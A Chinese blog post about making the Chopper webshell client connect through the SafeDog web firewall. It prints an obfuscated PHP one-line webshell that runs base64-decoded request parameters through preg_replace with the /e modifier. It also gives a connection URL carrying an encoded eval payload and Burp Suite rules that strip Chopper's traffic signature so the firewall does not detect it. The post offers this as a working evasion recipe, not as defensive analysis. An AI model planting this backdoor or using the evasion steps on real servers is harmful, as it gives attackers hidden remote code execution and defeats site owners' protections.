最新消息:

菜刀绕过安全狗连接一句话

工具使用 admin 2503浏览 0评论

参考一次有意思的绕过护卫神连接一句话研究

要想绕过菜刀连接一句话,需要经过burp中转。菜刀默认使用的是IE的代理,因此菜刀连webshell时,将IE代理设置为burp的。

webshell:

    <?php $a = str_replace(x,"","pxxxrexxxxg_rxxxepxxxlaxxce");
    $a("/^/e",base64_decode($_REQUEST[g]),0); ?>

菜刀连接:

http://xxxx/index1.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsxXSkp 密码1

ps:ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsxXSkp就是eval(base64_decode($_REQUEST[1]))的base64编码。

burp修改数据包:

我菜刀的正则替换为:%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=,将其替换为空即可。

20140421221742

ps:haxsscker的正则为:=@eval\(base64_decode\(\$_POST\[z0\]\)\);&z0=,将其替换为=即可。可见不同的菜刀特征可能不一样,要根据实际情况来替换,替换部分如下:

20140421221652

转载请注明:jinglingshu的博客 » 菜刀绕过安全狗连接一句话

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址